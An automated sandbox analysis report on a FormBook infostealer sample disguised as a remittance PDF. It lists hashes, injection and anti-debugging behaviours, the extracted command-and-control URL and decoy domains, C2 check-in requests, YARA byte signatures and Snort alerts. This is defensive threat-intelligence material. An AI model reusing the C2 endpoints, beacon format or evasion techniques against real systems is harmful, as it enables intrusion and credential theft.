Loading ...

Play interactive tourEdit tour

Analysis Report Remittance Advice pdf.exe

Overview

General Information

Sample Name:Remittance Advice pdf.exe
Analysis ID:403087
MD5:f597d74f90311fa86a708b211892d76f
SHA1:2d8f68efc677df2b2958e5631bffaf610a5661ab
SHA256:84d44657f148197e79e253ab0b50cdd8003e2b760318f9ab760b47fe4e25a594
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Remittance Advice pdf.exe (PID: 6452 cmdline: 'C:\Users\user\Desktop\Remittance Advice pdf.exe' MD5: F597D74F90311FA86A708B211892D76F)
    • DpiScaling.exe (PID: 6224 cmdline: C:\Windows\System32\DpiScaling.exe MD5: 302B1BBDBF4D96BEE99C6B45680CEB5E)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 7160 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • WWAHost.exe (PID: 4868 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 7024 cmdline: /c del 'C:\Windows\SysWOW64\DpiScaling.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.brandonprattdrums.com/nt8e/"], "decoy": ["cfwg123.com", "gazipasadan.xyz", "careogeen.com", "zitatewelten.com", "thecvpro.com", "viltais.com", "benimed.today", "rogerecameron.com", "courtclassesathome.com", "yakin-hm.com", "vidasanayprospera.com", "mandirana.com", "skybluebet.com", "rescuedpetsarewonderful.com", "solisdq.info", "affiliateside.com", "homewellliving.com", "missteenroyaluniverse.com", "bajrangproperties.com", "bundleobliss.com", "donotwasteyourvote.com", "shuziyuming.com", "sabalotours.com", "awesomebikeco.com", "katysteakhouse.com", "journeyofcamera.com", "electricmotorcyclecollector.com", "hincodrones.com", "rfscustominteriors.com", "agilelocker.com", "jobheap.com", "vrolin.com", "tudeladirecto.com", "tqwhspace.com", "ricoemail.com", "highfashionexchange.com", "simplicty-in-life.com", "3907allendale.com", "mostposh.com", "poshzip.com", "mohdnaved.com", "lostintraveland.com", "elitephoneskillsacademy.com", "coastalconciergebyliz.com", "enbranding.com", "tibetanartacademy.com", "intothenest.com", "andygreenphd.com", "whereistheherb.store", "thehimawaribrand.com", "wapdevs.com", "sewadorbsclothing.com", "citestaccnt1598677757.com", "radiosteel.com", "cover-solutions.com", "feeneylaminate.com", "minnesotawake.com", "eneralysis.com", "gomashio-taste.com", "neutralplasmaexchange.com", "liancaiwangv1.com", "jobonlineupdate.com", "runforlunch.com", "fux.xyz"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16079:$sqlite3step: 68 34 1C 7B E1
    • 0x1618c:$sqlite3step: 68 34 1C 7B E1
    • 0x160a8:$sqlite3text: 68 38 2A 90 C5
    • 0x161cd:$sqlite3text: 68 38 2A 90 C5
    • 0x160bb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
    00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      13.2.DpiScaling.exe.10410000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        13.2.DpiScaling.exe.10410000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x75c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7962:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13275:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x12d61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13377:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x134ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x836a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x11fdc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x90e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18357:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x193ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        13.2.DpiScaling.exe.10410000.4.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15279:$sqlite3step: 68 34 1C 7B E1
        • 0x1538c:$sqlite3step: 68 34 1C 7B E1
        • 0x152a8:$sqlite3text: 68 38 2A 90 C5
        • 0x153cd:$sqlite3text: 68 38 2A 90 C5
        • 0x152bb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x153e3:$sqlite3blob: 68 53 D8 7F 8C
        13.2.DpiScaling.exe.10410000.4.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          13.2.DpiScaling.exe.10410000.4.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.brandonprattdrums.com/nt8e/"], "decoy": ["cfwg123.com", "gazipasadan.xyz", "careogeen.com", "zitatewelten.com", "thecvpro.com", "viltais.com", "benimed.today", "rogerecameron.com", "courtclassesathome.com", "yakin-hm.com", "vidasanayprospera.com", "mandirana.com", "skybluebet.com", "rescuedpetsarewonderful.com", "solisdq.info", "affiliateside.com", "homewellliving.com", "missteenroyaluniverse.com", "bajrangproperties.com", "bundleobliss.com", "donotwasteyourvote.com", "shuziyuming.com", "sabalotours.com", "awesomebikeco.com", "katysteakhouse.com", "journeyofcamera.com", "electricmotorcyclecollector.com", "hincodrones.com", "rfscustominteriors.com", "agilelocker.com", "jobheap.com", "vrolin.com", "tudeladirecto.com", "tqwhspace.com", "ricoemail.com", "highfashionexchange.com", "simplicty-in-life.com", "3907allendale.com", "mostposh.com", "poshzip.com", "mohdnaved.com", "lostintraveland.com", "elitephoneskillsacademy.com", "coastalconciergebyliz.com", "enbranding.com", "tibetanartacademy.com", "intothenest.com", "andygreenphd.com", "whereistheherb.store", "thehimawaribrand.com", "wapdevs.com", "sewadorbsclothing.com", "citestaccnt1598677757.com", "radiosteel.com", "cover-solutions.com", "feeneylaminate.com", "minnesotawake.com", "eneralysis.com", "gomashio-taste.com", "neutralplasmaexchange.com", "liancaiwangv1.com", "jobonlineupdate.com", "runforlunch.com", "fux.xyz"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Remittance Advice pdf.exeReversingLabs: Detection: 34%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 13.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.DpiScaling.exe.10410000.4.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Remittance Advice pdf.exeJoe Sandbox ML: detected
          Source: 20.2.WWAHost.exe.3f91b8.1.unpackAvira: Label: TR/Patched.Ren.Gen8
          Source: 20.2.WWAHost.exe.3b87858.5.unpackAvira: Label: TR/Patched.Ren.Gen8
          Source: 13.2.DpiScaling.exe.10410000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Remittance Advice pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.6:49722 version: TLS 1.2
          Source: Binary string: WWAHost.pdb source: DpiScaling.exe, 0000000D.00000002.500290507.0000000004650000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000E.00000000.478459027.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: WWAHost.pdbUGP source: DpiScaling.exe, 0000000D.00000002.500290507.0000000004650000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: DpiScaling.exe, 0000000D.00000002.500837817.0000000004A2F000.00000040.00000001.sdmp, WWAHost.exe, 00000014.00000002.599807554.000000000376F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DpiScaling.exe, WWAHost.exe
          Source: Binary string: DpiScaling.pdb source: WWAHost.exe, 00000014.00000002.596791427.00000000003F9000.00000004.00000020.sdmp
          Source: Binary string: DpiScaling.pdbGCTL source: WWAHost.exe, 00000014.00000002.596791427.00000000003F9000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000E.00000000.478459027.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49745 -> 85.159.66.93:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49745 -> 85.159.66.93:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49745 -> 85.159.66.93:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49747 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49747 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49747 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 198.54.117.212:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 198.54.117.212:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 198.54.117.212:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.brandonprattdrums.com/nt8e/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.gazipasadan.xyz
          Source: C:\Windows\explorer.exeDNS query: www.fux.xyz
          Source: global trafficHTTP traffic detected: GET /nt8e/?blm=IHJLWq3Ti4lOD4kq8gztCbzA17cUlgM1ZPUn0ujbMY4leENIWoOfJYoGYHcW17z38P8xUAoycA==&tVTd=M6AhI HTTP/1.1Host: www.gazipasadan.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nt8e/?blm=TToywE07YkGPr1SSYVo5Zl0eXSAn7PGjTs4OR5iBsoxazNcvt6mcqDrbAAXGiUlQyBjZ6mutAA==&tVTd=M6AhI HTTP/1.1Host: www.sewadorbsclothing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nt8e/?blm=y/4CZD0u6UTnndZ84eN1F0ffB2o9AcFBv2a7yWGMbwZk5TncQjhg8LsZLuBmMcZQmigo4rhukg==&tVTd=M6AhI HTTP/1.1Host: www.fux.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
          Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /nt8e/?blm=IHJLWq3Ti4lOD4kq8gztCbzA17cUlgM1ZPUn0ujbMY4leENIWoOfJYoGYHcW17z38P8xUAoycA==&tVTd=M6AhI HTTP/1.1Host: www.gazipasadan.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nt8e/?blm=TToywE07YkGPr1SSYVo5Zl0eXSAn7PGjTs4OR5iBsoxazNcvt6mcqDrbAAXGiUlQyBjZ6mutAA==&tVTd=M6AhI HTTP/1.1Host: www.sewadorbsclothing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nt8e/?blm=y/4CZD0u6UTnndZ84eN1F0ffB2o9AcFBv2a7yWGMbwZk5TncQjhg8LsZLuBmMcZQmigo4rhukg==&tVTd=M6AhI HTTP/1.1Host: www.fux.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 03 May 2021 16:51:49 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 0000000E.00000000.473814734.0000000008551000.00000004.00000001.sdmpString found in binary or memory: http://schemas.micr
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000E.00000000.439337198.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.6:49722 version: TLS 1.2

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 13.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.DpiScaling.exe.10410000.4.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
